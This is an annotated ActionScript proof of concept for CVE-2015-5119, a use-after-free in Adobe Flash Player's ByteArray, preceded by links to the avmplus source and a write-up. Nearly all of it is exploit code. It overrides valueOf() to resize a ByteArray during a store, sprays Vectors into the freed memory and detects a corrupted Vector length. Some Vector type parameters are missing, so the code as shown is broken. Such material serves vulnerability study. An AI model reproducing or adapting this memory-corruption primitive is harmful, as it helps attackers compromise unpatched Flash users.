https://github.com/adobe/avmplus/blob/858d034a3bd3a54d9b70909386435cf4aec81d21/core/ScriptObject.cpp#L589
https://github.com/adobe/avmplus/blob/858d034a3bd3a54d9b70909386435cf4aec81d21/core/ScriptObject.h#L109
https://github.com/adobe/avmplus/blob/master/core/atom.h#L76
https://github.com/adobe/avmplus/blob/master/core/AvmCore.cpp#L2157
https://github.com/adobe/avmplus/blob/master/core/ByteArrayGlue.cpp#L1975
https://github.com/adobe/avmplus/blob/master/core/AvmCore.cpp#L4978
http://reversing.fr/adobe-flash-player-bytearray-use-after-free-cve-2015-5119/
// Proof-of-concept for the ByteArray use-after-free referenced by the links above
// (CVE-2015-5119, see the reversing.fr write-up). Extraction has stripped the
// Vector element-type parameters ("Vector." with nothing after the dot), so the
// listing as shown does not compile; the original presumably read Vector.<uint>
// or similar -- confirm against the source.
package
{
import flash.display.Sprite;
import flash.events.Event;
import flash.utils.ByteArray;
import flash.media.Sound;
import flash.external.ExternalInterface;
public class Main extends Sprite
{
//private var data:uint = 0xdeaddead;
// Filled inside o.valueOf() with freshly allocated Vectors; scanned afterwards
// for one whose length no longer matches the requested size.
private var va:Array;
// The ByteArray whose element is being written when o.valueOf() fires.
// Re-pointed at each a[i] in the trigger loop; resized from inside valueOf().
private var ba:ByteArray;// = new ByteArray();
// Object whose valueOf() is overridden; assigning it into a ByteArray slot forces
// the runtime to call that valueOf() for the numeric conversion (see ba[3] = o).
private var o:*;
// Declared but never read or written in this listing.
private var uv:Vector.
;
// Set to the first Vector in va whose length differs from 0x3f0, else stays null.
private var corrupted:Vector.;
//private var bp:Sound = new Sound();
public function Main(){
var alen:int = 90;
var a = new Array(alen);
o = new Object();
// Overridden valueOf(): runs in the middle of the ba[3] = o assignment below.
// It resizes the ByteArray currently referenced by ba (0xfa0 -> 0x1100) and then
// allocates five Vectors of length 0x3f0, before returning the byte value 0x40
// that the caller will store. The intent (per the linked write-up) is that the
// resize frees the buffer the pending store still targets -- not verifiable
// from this file alone.
o.valueOf = function(){
trace("******** Object.valueOf() Start ********");
va = new Array(5);
ba.length = 0x1100;
// `var i:int` has no initializer; AS3 defaults it to 0.
for (var i:int; i < va.length; i++)
va[i] = new Vector.(0x3f0);
trace("******** Object.valueOf() Finished ********");
return 0x40;
}
trace("******** Start a[n] allocating ********");
// Allocation pattern: for i = 0, 3, 6, ... fill a[i] = Object,
// a[i+1] = ByteArray of length 0xfa0, a[i+2] = Object. So every index
// congruent to 1 mod 3 holds a ByteArray. `i` is function-scoped in AS3 and is
// reused by the loop below.
for (var i:int; i < alen; i += 3){
a[i] = new Object();
a[i + 1] = new ByteArray();
a[i + 1].length = 0xfa0;
a[i + 2] = new Object();
}
trace("******** a[n] allocating finished ********");
trace("******** Start Uaf Triggering ********");
// Walk the ByteArrays backwards: alen - 5 = 85, and 85, 82, 79, ... are all
// congruent to 1 mod 3, i.e. the a[i + 1] slots populated above.
for (i = alen - 5; i >= 0; i -= 3){
ba = a[i];
trace("******** Call o.valueOf() ********");
// Storing an object into a byte slot triggers o.valueOf() (above), which
// resizes `ba` while this store is still in progress.
ba[3] = o;
// If the stored 0x40 is visible in the (resized) ByteArray, the write landed in
// the live buffer and the stale-write condition was not reached -- inferred
// from the trace text, not provable here.
if (ba[3] != 0) trace("******** UAF TRIGGERING FAILED ********");
// Look for a Vector whose length field no longer reads 0x3f0; the listing treats
// that as evidence the stale store hit memory later reused for a Vector.
for (var j:int = 0; j < va.length; j++){
if (va[j].length != 0x3f0){
corrupted = va[j]
}
}
if (corrupted != null){
trace("******** corrupted.length = 0x" + corrupted.length.toString(16) + " ********");
}
}
trace("******** Uaf Triggering Finished ********");
}
}
}